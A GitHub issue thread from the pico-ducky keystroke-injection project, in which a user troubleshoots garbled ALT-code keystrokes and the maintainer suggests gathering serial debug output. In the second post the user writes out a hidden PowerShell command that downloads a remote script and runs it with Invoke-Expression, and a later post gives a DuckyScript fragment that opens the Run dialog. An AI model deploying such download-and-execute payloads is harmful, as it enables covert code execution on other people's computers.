dbisu/pico-ducky #184: More than 3 key combinations not working

SENLINE232, 2023-06-01:
How to enter a character using alt code, I want to enter "p" is ALT+1+1+2 but instead I get a character ♀. It turned out that he can not clamp more than 3 keys. The command looks like this ALT KEYPAD_ONE KEYPAD_ONE KEYPAD_TWO. That is, only ALT KEYPAD_ONE KEYPAD_ONE is pressed. How can this limitation be bypassed?

SENLINE232, 2023-06-01:
Everything works very strange, I try to type powershell.exe -WindowStyle Hidden -Command "& {Invoke-Expression ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SENLINE232/dnlfile/main /s'))}"

but I get ♀☺‼◙♫☼h◙ll.◙x◙-Wi◙◙☺‼S►♀l◙Hi◙◙◙◙-C☺mma◙◙"&{I◙↕☺k◙-Ex♀♫ ◙☼☼i☺◙((N◙‼-Obj◙○►N◙►.W◙bCli◙◙►).D☺‼◙l☺a◙S►♫i◙g('h►►♀☼: //♫a‼.gi►h◄b◄☼◙♫○☺◙►◙◙►.○☺m/SENLINE232/◙◙lfil◙/mai◙/☼'))}"

SENLINE232, 2023-06-01:
Now I understand that some combinations of more than three keys work, but why the rest do not work. Even though I'm getting everything right.

dbisu, 2023-06-03:
there is no specific limit in the code.

SENLINE232, 2023-06-03:
here is what I roughly enter into payload.dd
this is right?

GUI r
DELAY 250
ALT KEYPAD_ONE KEYPAD_ONE KEYPAD_TWO
ALT KEYPAD_ONE KEYPAD_ONE KEYPAD_ONE
ALT KEYPAD_ONE KEYPAD_ONE KEYPAD_NINE
ALT KEYPAD_ONE KEYPAD_ZERO KEYPAD_ONE
ALT KEYPAD_ONE KEYPAD_ONE KEYPAD_FOUR
ALT KEYPAD_ONE KEYPAD_ONE KEYPAD_FIVE
ALT KEYPAD_ONE KEYPAD_ZERO KEYPAD_FOUR
ALT KEYPAD_ONE KEYPAD_ZERO KEYPAD_ONE
ALT KEYPAD_ONE KEYPAD_ZERO KEYPAD_EIGHT
ALT KEYPAD_ONE KEYPAD_ZERO KEYPAD_EIGHT

SENLINE232, 2023-06-03:
this is what this code enters ☺️‼️◙♫☼h◙. Why this happens, and how to fix it, is very important for those who want to enter characters, no matter what layout the user has.

dbisu, 2023-06-24:
If possible, include debug serial data. On Windows, use PuTTY, connect to the debug serial port (commonly COM3, but could vary)

On Linux, use minicom (minicom -b 115200 -o -D /dev/ttyACM0, where ttyACM0 corresponds to your device)

dbisu, 2023-09-17:
Closing, no activity.

closed 2023-09-17 by dbisu